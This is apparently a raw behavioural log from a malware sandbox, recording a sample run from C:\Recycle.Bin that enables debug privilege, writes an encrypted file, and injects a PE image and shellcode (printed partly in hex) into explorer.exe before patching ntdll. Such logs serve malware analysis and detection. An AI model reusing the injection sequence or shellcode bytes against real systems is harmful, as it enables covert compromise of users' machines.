1636 C:\WINDOWS\explorer.exe 19E0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 C37FF4
1636 C:\WINDOWS\explorer.exe 7C90CFEE 5 E9 BF 33 0D 85 success or wait 1 C32A6F
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe 3E0000 12FFA0 page execute and read and write success or wait 1 40FA57
2444 C:\Recycle.Bin\B6232F3AC2C.exe BD0000 12F610 page execute and read and write success or wait 1 3E1A32
2444 C:\Recycle.Bin\B6232F3AC2C.exe BF0000 12F610 page execute and read and write success or wait 1 3E2B0E
2444 C:\Recycle.Bin\B6232F3AC2C.exe C20000 12FBF4 page execute and read and write success or wait 1 404F1D
1636 C:\WINDOWS\explorer.exe BAD0000 12F5A8 page execute and read and write success or wait 1 C35848
1636 C:\WINDOWS\explorer.exe 19E0000 12F5D8 page execute and read and write success or wait 1 C37FF4
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page read and write page readonly success or wait 1 4611FF
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page readonly page read and write success or wait 1 461214
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 63000 page execute and read and write page readonly success or wait 1 3E0852
2444 C:\Recycle.Bin\B6232F3AC2C.exe 401000 3E000 page execute and read and write page execute and read and write success or wait 1 3E20AA
2444 C:\Recycle.Bin\B6232F3AC2C.exe 43F000 18000 page execute and read and write page execute and read and write success or wait 1 3E20AA
2444 C:\Recycle.Bin\B6232F3AC2C.exe 457000 1000 page read and write page execute and read and write success or wait 1 3E20AA
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page read and write page execute and read and write success or wait 1 456796
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page execute and read and write page read and write success or wait 1 4567AB
2444 C:\Recycle.Bin\B6232F3AC2C.exe C55FA8 1000 page execute and read and write page execute read success or wait 3 40375F
2444 C:\Recycle.Bin\B6232F3AC2C.exe 44E15C 1000 page execute and read and write page execute and read and write success or wait 1 404A59
2444 C:\Recycle.Bin\B6232F3AC2C.exe 451D90 2000 page execute and read and write page execute and read and write success or wait 1 404AB9
2444 C:\Recycle.Bin\B6232F3AC2C.exe CA5FA8 1000 page execute and read and write page execute read success or wait 2 C28790
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 1 C37E10
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Debug success or wait 2 BD0154
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003376826
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003380644
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2003384280
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003385717
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003386847
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2003387593
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003389045
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003389413
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2003391603
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2003394675
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2003398575
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2003404614
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2003406624
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2003409853
Section loaded Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: unknown Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2003418579
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2003423391
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2003427258
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2003445644
Section loaded Path: \KnownDlls\crypt32.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 2003455394
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2003457302
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2003461155
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2003462739
Section loaded Path: \KnownDlls\msimg32.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2003469816
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2003471425
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2003475405
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2003485718
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2003489274
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2003499798
Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2003507721
Section loaded Path: \KnownDlls\wininet.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2003511024
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2003517274
Section loaded Path: \KnownDlls\winmm.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2003525904
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2003527449
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2003544635
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2003547206
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2003549324
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2003562360
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 950000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2003565793
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 950000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2003584532
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 950000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2003627394
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2003630049
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2003639538
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2003642467
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2003644734
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 2003895823
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 2003896173
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 3E0000 Length: 12FFA0 Allocation Type: null Protection: page execute and read and write success or wait 2003955589
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 63000 New Protection: page execute and read and write New Protection: page readonly success or wait 2003973383
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: BD0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 2003974880
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: BF0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 2003975419
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 401000 Length: 3E000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2007379482
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 43F000 Length: 18000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2007379990
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 457000 Length: 1000 New Protection: page read and write New Protection: page execute and read and write success or wait 2007380287
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page execute and read and write success or wait 2007409618
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page execute and read and write New Protection: page read and write success or wait 2007410501
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007411520
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007413906
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2007414736
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 44E15C Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2007417353
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007417644
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007418020
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2007419163
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 451D90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2007419367
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName Name: ComputerName success or wait 2007420055
Privilege adjusted Privilege: Debug On or off: on success or wait 2007435225
File created Path: C:\Recycle.Bin\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false object name collision 2007435375
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2007436346
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007436654
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007436963
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2007437278
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C20000 Length: 12FBF4 Allocation Type: null Protection: page execute and read and write success or wait 2007437540
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid object name not found 2007439146
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2007439769
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2007441496
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2007442109
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2007444606
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007445059
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007445375
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: CA5FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2007445712
File created Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2007446104
File write Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2007449958
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007451236
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007451602
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: CA5FA8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2007451843
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2007452225
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2007453102
Section loaded Path: \BaseNamedObjects\DBWIN_BUFFER Access: write Type: unknown Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid object name not found 2007455294
File opened Path: \pipe\globpluginsuninstallpipe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2007455482
System info queried Type: ProcessInformation success or wait 2007455804
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2007458366
Privilege adjusted Privilege: Debug On or off: on success or wait 2007458916
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BAD0000 Length: 12F5A8 Allocation Type: null Protection: page execute and read and write success or wait 2007461401
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2007488830
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BADAFFC Length: 13 Value: B8 00 00 EB 0A 50 BA 50 16 AF 0B FF D2 success or wait 2007517280
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 19E0000 Length: 12F5D8 Allocation Type: null Protection: page execute and read and write success or wait 2007517467
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2007517851
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007518162
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2007518248
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007518492
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2007518580
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2007518687
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007518916
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2007519005
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2007519184
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BD0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2007519340
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 19E0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2007546915
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 0D 85 success or wait 2007604325
Process terminated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe success or wait 2007604530
Analysis File: winlogon.exe PID: 636 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:04
Start date: 01/12/2011
Path: C:\WINDOWS\system32\winlogon.exe
Commandline: winlogon.exe
Imagebase: 0x1000000
File size: 507904 bytes
MD5 hash: ED0EF0A136DEC83DF69F04118870003E
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ws2_32.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 4 BAE1D35
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 4 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
